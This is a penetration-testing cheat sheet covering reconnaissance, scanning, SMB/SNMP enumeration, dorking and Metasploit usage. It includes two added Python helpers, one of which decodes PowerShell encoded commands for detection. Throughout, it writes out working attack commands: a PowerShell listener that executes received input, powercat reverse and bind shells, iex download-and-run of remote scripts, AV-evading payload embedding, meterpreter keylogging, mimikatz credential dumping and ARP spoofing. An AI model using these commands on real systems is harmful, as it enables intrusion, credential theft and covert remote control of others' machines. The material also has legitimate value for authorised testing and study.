- `powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"`
  - Binding port 443 requires an elevated prompt on most Windows hosts; pick a higher port if the listener fails to start
Powercat
Script: `powercat.ps1`.

| Command | Description |
|---|---|
| `powercat -c <IP> -p <PORT> -i C:\<DIR>\powercat.ps1` | Send a file |
| `powercat -c <IP> -p <PORT> -e cmd.exe` | Send a reverse shell |
| `powercat -l -p 443 -e cmd.exe` | Set up a bind shell; `-l` creates a listener, `-p` specifies the listening port number, `-e` has an application executed once connected |
| `powercat -c <IP> -p <PORT> -e cmd.exe -g > reverseshell.ps1` | Create a stand-alone payload |
| `powercat -c <IP> -p <PORT> -e cmd.exe -ge > encodedreverseshell.ps1` | Create an encoded stand-alone payload with powercat |
Load a remote PowerShell script using iex
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Execute an encoded stand-alone payload using PowerShell
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHI...
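The encoding used by `-EncodedCommand` above (base64 over the UTF-16LE bytes of the script, the same thing the `iconv -t UTF-16LE | base64 -w 0` one-liner produces), as an added example that is not part of the EasyG notes or of powercat: a Python helper that builds the argument and, for the blue-team side of the same trick, recovers the script from an encoded command found in a process listing or a log line. The sample command lines are constructed; PowerShell accepts any unambiguous prefix of `-EncodedCommand` (`-e`, `-ec`, `-enc`, ...), which the decoder takes into account.

```python
"""Added example (not from the EasyG page): encode/decode PowerShell -EncodedCommand.

PowerShell expects base64(UTF-16LE(script)) with no byte-order mark. The same
transformation is applied in reverse to read encoded commands out of logs.
"""
import base64
import re

# "-e", "-ec", "-enc", ... "-encodedcommand": any prefix of the full switch works.
_ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")


def encode_powershell(script: str) -> str:
    """Return the value to pass after -EncodedCommand / -E."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell; tolerates stripped '=' padding."""
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def build_command_line(script: str) -> str:
    """Assemble a typical non-interactive invocation around the encoded blob."""
    return f"powershell.exe -NoProfile -NonInteractive -EncodedCommand {encode_powershell(script)}"


def decode_from_command_line(cmdline: str):
    """If `cmdline` carries an encoded command, return the decoded script, else None.

    -ExecutionPolicy also starts with -e, so each candidate switch is checked to
    be a real prefix of "encodedcommand" before its argument is decoded.
    """
    for m in _ENCODED_SWITCH.finditer(cmdline):
        switch, blob = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(switch):
            try:
                return decode_powershell(blob)
            except (ValueError, UnicodeDecodeError):
                return None
    return None


if __name__ == "__main__":
    cmd = build_command_line("iex (New-Object Net.WebClient).DownloadString('http://<IP>/x.ps1')")
    print(cmd)
    print(decode_from_command_line(cmd))
```

Because the encoded form hides every keyword from a plain-text grep, a detection built on process command lines should decode the argument first and match on the result, exactly as `decode_from_command_line` does.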
Upload a file to an FTP server
- `$ftpRequest = [System.Net.FtpWebRequest]::Create("ftp://<IP>:<PORT>/<FILE_TO_UPLOAD>"); $ftpRequest.Credentials = New-Object System.Net.NetworkCredential("<USERNAME>", "<PASSWORD>"); $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile; $fileContents = [System.IO.File]::ReadAllBytes((Resolve-Path "<FILE_TO_UPLOAD>")); $ftpRequest.ContentLength = $fileContents.Length; $requestStream = $ftpRequest.GetRequestStream(); $requestStream.Write($fileContents, 0, $fileContents.Length); $requestStream.Close(); $response = $ftpRequest.GetResponse(); $response.Close()`
- Change `<IP>`, `<PORT>`, `<FILE_TO_UPLOAD>`, `<USERNAME>` and `<PASSWORD>` to match the target; over plain FTP the credentials and the file contents travel in cleartext
Filters
- `net 10.10.1.0/24`, capture traffic only on the `10.10.1.0/24` address range
Display filters
- `tcp.port == 21`, only display FTP control-channel traffic (file transfers use port 20 or an ephemeral port and need their own filter)
Misc operations
- Follow TCP stream: Right-click > Follow > TCP Stream
- `tcpdump -r packets.pcap` read a packet capture
- `tcpdump -n -r packets.pcap | awk -F" " '{print $3}' | sort | uniq -c | head` read and filter the packet capture
  - `-n` skips DNS name lookups, `-r` reads from our packet capture file
  - `awk` prints the third field, which in tcpdump's default output is the source IP address and port (`src > dst` order); `sort` and `uniq -c` sort and count the number of times the field appears in the capture; `head` only displays the first 10 lines of the output
- `tcpdump -n src host <IP> -r packets.pcap` tcpdump filters; `src host` to output only traffic coming from that source
- `tcpdump -n dst host <IP> -r packets.pcap` tcpdump filters; `dst host` to output only traffic going to that destination
- `tcpdump -n port <PORT> -r packets.pcap` tcpdump filters; filter by port number
- `tcpdump -nX -r packets.pcap` `-X` prints packet data in both hex and ASCII format
Advanced Header Filtering: display only the data packets
- Look for packets that have the `PSH` and `ACK` flags turned on
  - The `ACK` flag will be set for all packets sent and received after the initial 3-way handshake
  - In interactive Application Layer protocols, the `PSH` flag is frequently used to guarantee rapid delivery of a packet and prevent buffering
- The TCP flags live in the 14th byte of the TCP header, which is offset 13 counting from zero, hence `tcp[13]` in the filter
  - `ACK` and `PSH` are the fifth and fourth bits of that byte (values 16 and 8)
  - Turning on these two bits gives `00011000` = `24` in decimal, verify it with `echo "$((2#00011000))"`
- To display packets that have exactly the ACK and PSH flags set: `sudo tcpdump -A -n 'tcp[13] = 24' -r packets.pcap`
  - `= 24` is an exact comparison of the whole byte, so a segment that also carries another flag (e.g. `URG`) is not shown; use a bitmask comparison with `&` instead of `=` when the other flags must not matter
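The `tcp[13]` arithmetic above, checked on real bytes as an added example that is not part of the EasyG notes: the script builds minimal TCP headers with `struct` (a synthetic handshake plus one data segment, constructed for the example, not taken from a capture), reads the flags byte at offset 13, and shows the difference between tcpdump's exact match (`tcp[13] = 24`) and a bitmask match (`tcp[13] & 24 = 24`).

```python
"""Added example (not from the EasyG page): TCP flags byte and the tcp[13] filter.

Headers are synthetic (built with struct, no options), so the offsets are the
ones of a plain 20-byte TCP header exactly as tcpdump indexes them.
"""
import struct

# Bit values of the TCP flags byte, lowest bit first (RFC 793 plus ECE/CWR).
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
             "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80}


def flag_mask(*names: str) -> int:
    """Combine flag names into the value tcpdump compares tcp[13] against."""
    return sum(TCP_FLAGS[n] for n in names)


def build_tcp_header(sport: int, dport: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    """Minimal 20-byte TCP header: ports, seq, ack, data offset (5 words), flags, window, checksum, urgent."""
    data_offset = 5 << 4                      # upper nibble of byte 12
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                       data_offset, flags, 65535, 0, 0)


def flags_of(header: bytes) -> int:
    """tcp[13]: the flags byte is at offset 13 of the TCP header."""
    return header[13]


def has_exactly(header: bytes, mask: int) -> bool:
    """tcpdump 'tcp[13] = mask': these flags and no others."""
    return flags_of(header) == mask


def has_all(header: bytes, mask: int) -> bool:
    """tcpdump 'tcp[13] & mask = mask': these flags set, others ignored."""
    return flags_of(header) & mask == mask


def flag_names(header: bytes):
    """Human-readable flag list, e.g. ['PSH', 'ACK'], for display."""
    value = flags_of(header)
    return [name for name, bit in TCP_FLAGS.items() if value & bit]


def data_packets(headers):
    """Indices of segments carrying interactive application data (PSH and ACK set)."""
    return [i for i, h in enumerate(headers) if has_all(h, flag_mask("PSH", "ACK"))]


# Constructed sample: 3-way handshake to an FTP server, one data segment, its ACK,
# and one data segment that additionally sets URG (caught by has_all, missed by has_exactly).
HANDSHAKE_AND_DATA = [
    build_tcp_header(40000, 21, flag_mask("SYN")),
    build_tcp_header(21, 40000, flag_mask("SYN", "ACK")),
    build_tcp_header(40000, 21, flag_mask("ACK")),
    build_tcp_header(40000, 21, flag_mask("PSH", "ACK")),          # "USER anonymous\r\n"
    build_tcp_header(21, 40000, flag_mask("ACK")),
    build_tcp_header(40000, 21, flag_mask("PSH", "ACK", "URG")),   # "ABOR\r\n" with urgent pointer
]


if __name__ == "__main__":
    print("PSH+ACK mask:", flag_mask("PSH", "ACK"), "=", format(flag_mask("PSH", "ACK"), "08b"))
    for i, h in enumerate(HANDSHAKE_AND_DATA):
        print(i, flag_names(h), "exact:", has_exactly(h, 24), "mask:", has_all(h, 24))
    print("data segments:", data_packets(HANDSHAKE_AND_DATA))
```

Index 5 is the case the exact-match filter from the page silently drops: its flags byte is 56 (URG+PSH+ACK), so `tcp[13] = 24` is false while `tcp[13] & 24 = 24` is true.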
- Grep all the subdomains for `target.com` from `index.html`: `grep -o '[^/]*\.target\.com' index.html | sort -u > list.txt`
- Get the IPs from `list.txt`: `for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u`
| Command | Description |
|---|---|
| `sudo systemctl start postgresql` | Start postgresql manually |
| `sudo systemctl enable postgresql` | Start postgresql at boot |
| `sudo msfdb init` | Create the Metasploit database |
| `sudo apt update; sudo apt install metasploit-framework` | Update the Metasploit Framework |
| `sudo msfconsole -q` | Start the Metasploit Framework (`-q` skips the banner) |
| `show -h` | Help for the `show` command |
| `show auxiliary` | List all auxiliary modules |
| `search type:auxiliary name:smb` | Search for SMB auxiliary modules |
| `back` | Move out of the current context and return to the main msf prompt |
| `previous` | Switch back to the previously selected module |
| `services` | Display the services stored in the Metasploit database; `-p`: filter by port number, `-s`: service name, `-h`: help |
| `hosts` | Show discovered hosts |
| `db_nmap <IP> -A -Pn` | Perform an Nmap scan from within Metasploit, storing the results in the database |
| `workspace` | List workspaces; `-a`: add a workspace, `-d`: delete a workspace |
| `sessions -l` | List all sessions; `-i`: interact with a session |
| `transport list` | List the currently available transports for the meterpreter connection |
To interact with a module
- `info` request more info about the module
- `show options` most modules require options
  - Use `set` and `unset` to configure the options
  - Use `setg` and `unsetg` to configure global options
- `show payloads` list all payloads that are compatible with the current exploit module
- `check` check if the target is vulnerable
- `run` or `exploit` to run the exploit
  - `-j` use as background job
- `jobs` list background jobs
- `kill` kill job
- `windows/shell_reverse_tcp` Connect back to attacker and spawn a command shell
- `windows/shell/reverse_tcp` Connect back to attacker, spawn cmd shell (staged)
  - Useful, for example, if the vulnerability you need to exploit doesn't have enough buffer space to hold a full payload
- `upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\tidus`
- `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
- `shell` get the shell
- `generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe` embedding the payload in plink.exe from within msfconsole
- Use the framework `multi/handler` to catch standard reverse shells
  - Works for all single and multi-stage payloads
  - Specify the incoming payload type
- `screenshot` take a screenshot of the compromised host desktop
- `keyscan_start` start the keystroke sniffer
- `keyscan_dump` dump captured keystrokes
- `keyscan_stop` stop the keystroke sniffer
Migrate your meterpreter process
- `ps` view all running processes and then pick one
- `migrate <PID>` migrate the process to a target PID
Use mimikatz from meterpreter
- `load kiwi` run the extension kiwi
- `getsystem` acquire SYSTEM privileges
- `creds_msv` dump the system credentials
Port forwarding
- `meterpreter> portfwd -h`
- Example: `portfwd add -l 3389 -p 3389 -r 192.168.1.121`
For a temporary server
- `python -m SimpleHTTPServer 7331`
- `python3 -m http.server 7331`
- `php -S 0.0.0.0:8000`
- `ruby -run -e httpd . -p 9000`
- `busybox httpd -f -p 10000`
For a temporary public server
For a temporary FTP server
- Host: `python -m pyftpdlib -w`
- Client: `ftp open <IP> 2121 anonymous`
For auths
- textverified.com for auths requiring a phone number
- temp-mail.org
To find parameters
- Arjun detection of the parameters present in the application
- ParamSpider
Asset enumeration/discovery
- amass: `amass enum -brute -active -d target -o output/target.txt -v`
- subfinder: `subfinder -d target -all -o output/target_subfinder.txt`
- github-subdomains
- bgp.he.net to find ASN + `amass intel -asn <ASN>`
- crt.sh
- Crtsh-Fetcher
- To find new domains: `cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt`
- gobuster + all.txt by jhaddix
- dnsx
- Reverse DNS lookup: `cat ip.txt | dnsx -ptr -resp-only`
- VhostScan to discover virtual hosts
- gip a command-line tool and Rust library to check global IP address.
- anew to add only new subdomains
- httpx: `type scope.txt | httpx -sc -mc 404` find `404` pages
- urless
- hakcheckurl, combined with urless: `python3 urless.py -i urls.txt | hakcheckurl | grep -v 404`
Exploits
- SearchSploit: `searchsploit afd windows -w -t`; `-w` to return the URL for https://www.exploitdb.com, `-t` to search the exploit title
- Packet Storm
- BugTraq
- National Vulnerability Database
- Browser Exploitation Framework (BeEF)
- PoC in GitHub
For Reporting
- Vulnerability Rating Taxonomy
- CVSS Calculator
- PwnDoc
- Vulnrepo
- PlexTrac
- Offensive Security Exam Report Template in Markdown
Misc tools
- URL Decoder/Encoder
- base64encode.org
- Down or not
- DigitalOcean See Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation
- Exploit Database
- USB Rubber Ducky
- Flipper Zero
- Create a random text file
- BruteSpray: `python brutespray.py --file nmap.xml --threads 5 --hosts 5`
- BadSecrets a library and command line tool for finding secrets
- Proxyman to view requests from the app on your computer
- filesec.io
- malapi.io
- lots-project.com
- lolbas-project.github.io
- gtfobins.github.io
- loldrivers.io
- WAF Bypass Tool
- Forensia
- peepdf - PDF Analysis Tool
- Target validation
- Search for email addresses of employees
- What's the format? Does it change for founders, chief officers etc.?
- Search for corporate social media accounts
- Use whois: `whois targetcorp.com`
- Google Dorking
- Start searching for PHP files and directory listing
- Search for any company acquisitions of the target
- See also Content Discovery
- See each section of this chapter
- Use `WHOIS`, `nslookup` and `dnsrecon`
- searchdns.netcraft.com
- Search for registration information and site technology entries
- Recon-ng
  - `marketplace search github` Search the Marketplace for GitHub modules
  - `marketplace info recon/domains-hosts/google_site_web` Get information on a module
  - `marketplace install recon/domains-hosts/google_site_web` Install a module
  - `modules load recon/domains-hosts/google_site_web` Load a module
  - `info` Get info about the loaded module
  - `options set SOURCE targetcorp.com` Set a source
  - `run` Run a module
  - `back` Get back to default
  - `show` Show the results; hosts, companies, leaks etc.
  - Use `recon/domains-hosts/google_site_web` combined with `recon/hosts-hosts/resolve`
- Passively search for information in open-source projects and online code repositories.
- Shodan
  - `hostname:targetcorp.com` Search for TargetCorp's domain
  - `hostname:targetcorp.com port:'22'` Search for TargetCorp's domain running SSH
- Security Headers Scanner
- SSL Server Test
- DMARC Inspector
Note: A company may only approve tests of its own systems. Personal devices, outside email, and social media accounts used by employees often do not come under this authorisation.
- theHarvester: `theharvester -d targetcorp.com -b google`; `-d` specify target domain, `-b` set data source to search
- hunter.io
- Phonebook.cz
- voilanorbert.com
- Clearbit
Verify email addresses
Malicious hackers frequently post stolen passwords on Pastebin or other less reputable websites. This is useful for generating wordlists.
- An example: rockyou.txt
Search for any acquisitions by the target
host command
- `host www.targetcorp.com` Find the A host record
- `host -t mx www.targetcorp.com` Find the MX record
- `host -t txt www.targetcorp.com` Find the TXT record
- `host -l <domain name> <dns server address>` Perform a DNS zone transfer; `-l`: list zone
Brute force forward DNS name lookups using a list like possible_subs.txt containing common hostnames (see SecLists):
`for ip in $(cat possible_subs.txt); do host $ip.megacorpone.com; done`
Brute force reverse DNS names
`for ip in $(seq 50 100); do host 38.100.193.$ip; done | grep -v "not found"`
Tools
- DNSRecon
  - `dnsrecon -d zonetransfer.com -t axfr` Perform a zone transfer; `-t`: specify the type of enumeration to perform
  - `dnsrecon -d zonetransfer.com -D ~/list.txt -t brt` Brute forcing hostnames
- DNSenum
  - `dnsenum zonetransfer.me` Perform a zone transfer
- Wappalyzer
- WhatWeb
- BuiltWith
- `nc -nvv -w 1 -z <IP> <PORT-RANGE>` Use netcat to perform a TCP port scan
- `nc -nv -u -z -w 1 <IP> <PORT-RANGE>` Use netcat to perform a UDP port scan
- `nmap <IP>` Simple nmap scan
- `nmap -p 1-65535 <IP>` Scan all the ports
- `nmap -sS <IP>` Stealth / SYN scanning (will not appear in any application logs)
- `nmap -sT <IP>` TCP connect scan
- `nmap -sU <IP>` UDP scan
- `nmap -sS -sU <IP>` Perform a combined UDP and SYN scan
- `nmap -sn <IP>` Perform a network sweep
- `nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml` Discover everything including running services using a list of targets
- `nmap -sn <net_address_in_cdr>` Check hosts alive, adding `-A` you gather more info for a target
- `nmap -sT -A <IP-range>` Banner grabbing and/or service enumeration
- `nmap -sT -A --top-ports=20 <IP-range> -oG top-port-sweep.txt` Perform a top twenty port scan, save the output in greppable format
- `nmap -O <IP>` OS fingerprinting
- `nmap -sV -sT -A <IP>` Banner grabbing, service enumeration
Find live hosts
---------------
nmap -v -sn <IP-range> -oG ping-sweep.txt
grep Up ping-sweep.txt | cut -d " " -f 2
Find web servers using port 80
------------------------------
nmap -p 80 <IP-range> -oG web-sweep.txt
grep open web-sweep.txt | cut -d " " -f 2
Nmap Scripting Engine (NSE)
---------------------------
nmap --script-help dns-zone-transfer View information about a script, in this case "dns-zone-transfer"
nmap <IP> --script=smb-os-discovery OS fingerprinting (SMB services)
nmap --script=dns-zone-transfer -p 53 ns2.zonetransfer.com Perform a DNS zone transfer
nmap --script http-headers <IP> OS fingerprinting (HTTP supported headers)
nmap --script http-title <IP>
Other usages
------------
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p - <IP>
- `masscan -p80 10.0.0.0/8` Look for all web servers using port 80 within a class A subnet
- `masscan -p80 10.11.1.0/24 --rate=1000 -e tap0 --router-ip 10.11.0.1`
  - `--rate` specify the desired rate of packet transmission
  - `-e` specify the raw network interface to use
  - `--router-ip` specify the IP address for the appropriate gateway
- httprobe designed to find web servers: `type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt`
- naabu a fast port scanner
  - A simple usage using a list of subdomains: `naabu -v -list subs.txt -stats -o out.txt`
  - Discover everything faster, excluding some ports maybe already checked: `naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt`
- Powershell
  - SMB port scanning: `Test-NetConnection -Port 445 <IP>`
  - `1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("<IP>", $_)) "TCP port $_ is open"} 2>$null`
- nmapAutomator
Resources
- smbclient
- CrackMapExec
  - `crackmapexec smb <IP> -u usernames.txt -p passwords.txt --continue-on-success`
  - `crackmapexec smb <IP> -u <user> -p <password> --shares`
- "A Little Guide to SMB Enumeration"
Enumerate SMB Shares
smbclient
---------
- `smbclient -L <IP>` see which shares are available
- `smbclient //<IP>/<share>` connect to the SMB share
- `smbclient -p <port> -L //<IP>/ -U <username> --password=<password>` connect to the SMB share
- `get <file>` get files
net
---
- `net view \\<IP> /All` see which shares are available
- `net use \\<IP>\<share>` connect to the SMB share
- `copy \\<IP>\<share>\<file>` get files
Use nmap to scan for the NetBIOS service
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
Use nbtscan to collect additional NetBIOS information
sudo nbtscan -r 10.11.1.0/24
Find various nmap SMB NSE scripts
ls -1 /usr/share/nmap/scripts/smb*
Example: `nmap -v -p 139,445 --script=smb-os-discovery <IP>`
Determining whether a host is vulnerable to the MS08_067 vulnerability
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 <IP>
Note: with the script parameter `unsafe=1`, the scripts that run are almost guaranteed to crash a vulnerable system
General notes
- Remember that you can transfer files to the share with `copy <file> \\<IP>\share`
- Also when using `sudo impacket-smbserver -smb2support share .`
Find and identify hosts that have portmapper/rpcbind running using nmap
nmap -v -p 111 10.11.1.1-254
Query rpcbind in order to get registered services
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
Nmap NFS NSE Scripts
ls -1 /usr/share/nmap/scripts/nfs*
Run all these scripts with `nmap -p 111 --script nfs* <IP>`
Example of entire /home directory shared
Mount the directory and access the NFS share
--------------------------------------------
mkdir home
sudo mount -o nolock <IP>:/home ~/home/
cd home/ && ls
Add a local user
----------------
sudo adduser pwn Add the new user "pwn"
sudo sed -i -e 's/1001/1014/g' /etc/passwd Change the UID of the "pwn" user (to match the owner of the shared files)
cat /etc/passwd | grep pwn Verify that the changes have been made
Interesting commands
- `VRFY` request asks the server to verify an email address
- `EXPN` asks the server for the membership of a mailing list
- Use telnet to connect to the target to gather information: `telnet <IP> 25`
- Port scanning with Powershell: `Test-NetConnection -Port 25 <IP>`
Use nc to validate SMTP users: `nc -nv <IP> 25`
Use nmap for SMTP enumeration: `nmap -p 25 --script=smtp-enum-users <IP>`
Use nmap to perform a SNMP scan
sudo nmap -sU --open -p 161 <IP-range> -oG open-snmp.txt
Use onesixtyone to brute force community strings
- Build a text file containing community strings: `echo public > community; echo private >> community; echo manager >> community`
- Build a text file containing IP addresses to scan: `for ip in $(seq 1 254); do echo 192.168.45.$ip; done > ips`
- Use onesixtyone: `onesixtyone -c community -i ips`
Note: this works provided we at least know the SNMP read-only community string (in most cases it is "public")
Use snmpwalk to enumerate
- The entire MIB tree: `snmpwalk -c public -v1 -t 10 <IP>`
  - `-c`: specify the community string
  - `-v`: specify the SNMP version number
  - `-t 10`: increase the timeout period to 10 seconds
- Windows users: `snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25`
- Windows processes: `snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2`
- Installed software: `snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2`
- httprobe
  - example: `cat subdomains.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > output.txt`
- naabu + httprobe, to find hidden web ports
  - example: `naabu -v -list subdomains.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o naabu.txt` then `cat naabu.txt | httprobe > results.txt`
- Port `22`, connect with `ssh <ip>`, `ssh <ip> -oKexAlgorithms=+<option>`, `ssh <ip> -oKexAlgorithms=+<option> -c <cipher>`
- PuTTY
- Search for a banner, to get more info
Some tips
- If the application is ASP.NET, search for `Appsettings.json`
- Use recursion. If you encounter a `401` response, search with waybackmachine
- Search for past reports in the same program
Check the tech of a target with
- Wappalyzer
- Webanalyze, port of Wappalyzer for the command line: `./webanalyze -host example.com -crawl 1`
- Shodan for Chrome and for Firefox
Tools
- feroxbuster: `feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403`
- dirsearch
  - `dirsearch -l list.txt -x 404,500,501,502,503 -e *`
  - `dirsearch -u target.io -x 404,500,501,502,503 -e *`
  - `dirsearch -u <target> -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php`
- DIRB: `dirb http://www.target.com -r -z 10`
- changedetection.io
- ffuf: `ffuf -u 'http://<IP>/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0`
Crawling
- gospider: `gospider -s target -c 10 -d 4 -t 20 --sitemap --other-source -p http://localhost:8080 --cookie "0=1" --blacklist ".(svg|png|gif|ico|jpg|jpeg|bpm|mp3|mp4|ttf|woff|ttf2|woff2|eot|eot2|swf|swf2|css)"`
- hakrawler: `cat target.txt | hakrawler -u -insecure -t 20 -proxy http://localhost:8080 -h "Cookie: 0=1"`
- Katana: `katana -u target -jc -kf -aff -proxy http://127.0.0.1:8080 -H "Cookie: 0=1"`
Wordlists
To find more endpoints
- Apkleak to get endpoints from an apk
- Source2Url to get endpoints from a source code
- waymore more results from the Wayback Machine
- BurpJSLinkFinder
- trashcompactor to remove URLs with duplicate funcionality based on script resources included
- `ext:` search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form, swf
- `filetype:` search for filetypes like html or php
- `-filetype:html` omit filetype html
  - Search also for pdf, xlsx, bak and similar, they may contain some infos
- `site:` to target a website and its subdomains
- `inurl:&` to search for parameters
- `intitle:` to search interesting pages like admin, register, login etc.
- `"Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com` [Reference]
- `intext:"© copyright COMPANY YEAR"` [Reference]
- `site:target.com intext:login intext:username intext:password`
- Exposed .git: `intext:"index of /.git" "parent directory"`
- Search for s3 buckets: `site:.s3.amazonaws.com "COMPANY"`
- Find CVEs, like CVE-2019-9647: `intext:"Powered by Gila CMS"`
- Errors: `site:target.com intext:"Warning: mysql_num_rows()"`
- Directory listing: `intitle:"Index of /" + ".htaccess"`, `intitle:"index of" "parent directory"`
- Google Dorks - Cloud Storage:
  - `site:http://s3.amazonaws.com "target.com"`
  - `site:http://blob.core.windows.net "target.com"`
  - `site:http://googleapis.com "target.com"`
  - `site:http://drive.google.com "target.com"`
- Google Hacking Database
- DorkSearch.com
- Refine web searches | Google
- sensitive words: password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret
- languages: json, bash, shell, java etc., example `HEROKU_API_KEY language:json`
- extensions: bat, config, ini, env etc.
- filename: netrpc, .git-credentials, .history, .htpasswd, bash_history, example `filename:users`
- Other dorks
  - `hostname:targetcorp.com` Search for TargetCorp's domain
  - `hostname:targetcorp.com port:'22'` Search for TargetCorp's domain running SSH
Tools
- Echo Mirage
- Wireshark
- PCredz
- Impacket
  - `impacket-mssqlclient <user>:<password>@<IP> -windows-auth`
  - `impacket-psexec -hashes 00000000000000000000000000000000:<NTLM> <USERNAME>@<IP>`
  - `impacket-psexec <USERNAME>:<PASSWORD>@<IP>`
- putty
- MobaXterm
- proxychains
- Samba suite
- Enum
- Winfo
- enum4linux
- macchanger
- `ip route` on Linux box
- `route print` on Windows
- `netstat -r` on Mac OSX
- `ip addr` on Linux
- `ipconfig /all` on Windows
- `ifconfig` on MacOS
- `netstat -ano` on Windows
- `netstat -tunp` on Linux
on MacOS
--------
- `netstat -p tcp -p udp`
- `lsof -n -i4TCP -i4UDP`
- `ip route add <net_address_in_cdr> via <interface_gateway>` on Linux
- `route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway>` on Windows
- `nmap -sn <net_address_in_cdr>` Check hosts alive, adding `-A` you gather more info for a target
Windows
-------
- `nbtstat /?` help command
- `nbtstat -A <Target-IP>` display information about a target
- `NET VIEW <Target-IP>` enumerate the shares of a target
- `NET USE \\<Target-IP>\IPC$ '' /u:''` connect to a Windows share; connect to the 'IPC$' share by using an empty username and password
Linux
-----
- `nmblookup -A <Target-IP>` same as nbtstat for Linux; display information about a target
- `smbclient -L //<Target-IP> -N` access Windows shares
- `smbclient //<Target-IP>/IPC$ -N` connect to a Windows share; connect to the 'IPC$' share by using an empty username and password
Enum
----
- `enum -s <Target-IP>` enumerate the shares of a machine
- `enum -U <Target-IP>` enumerate the users of a machine
- `enum -P <Target-IP>` check the password policy of a machine
Winfo
-----
- `winfo <Target-IP> -n` use winfo with a null session
- `ip addr` query available network interfaces
- `ip route` enumerate network routes
- `for i in $(seq 1 254); do nc -zv -w 1 <octet>.<octet>.<octet>.$i <port>; done` bash loop with Netcat to sweep for port <PORT> in a subnet
- `tracert <target>` shows details about the path that a packet takes from the sending device to the specified target destination
- `for ip in $(echo '<IP>'); do ping -c 5 $ip; traceroute $ip; echo '\nnslookup'; nslookup $ip; done`
- `ip neighbour` on Linux
- `arp -a` on Windows
- `arp` on *nix OS
- The goal is to (1) trick the victim into saving in its ARP cache the attacker's MAC address associated with the router IP and (2) get the router to send the traffic back to you, in order to perform a MITM
- First, enable Linux kernel IP forwarding to turn a Linux box into a router: `echo 1 > /proc/sys/net/ipv4/ip_forward`
- Run arpspoof: `arpspoof -i <interface> -t <target> -r <host>`
- Check also Ettercap
An example
`echo 1 > /proc/sys/net/ipv4/ip_forward`
`arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16`
Service | Port |
---|---|
SMTP | 25 |
SSH | 22 |
POP3 | 110 |
IMAP | 143 |
HTTP | 80 |
HTTPS | 443 |
NETBIOS | 137, 138, 139 |
SFTP | 115 |
Telnet | 23 |
FTP | 21 |
RDP | 3389 |
MySQL | 3306 |
MS SQL Server | 1433 |
Confluence | 8090 |
See : "Open Port Vulnerabilities List by Dirk Schrader"
Ports | Vulnerabilities |
---|---|
20, 21 (FTP) | - Brute-forcing - Anonymous authentication ( anonymous as username and password) - Cross-site scripting - Directory traversal attacks |
22 (SSH) | - leaked SSH keys - Brute-forcing |
23 (Telnet) | - Brute-forcing - Spoofing - Credential sniffing |
25 (SMTP) | - Spoofing - Spamming |
53 (DNS) | - DDoS |
137, 139 (NetBIOS over TCP) 445 (SMB) | - EternalBlue - Capturing NTLM hashes - Brute-force |
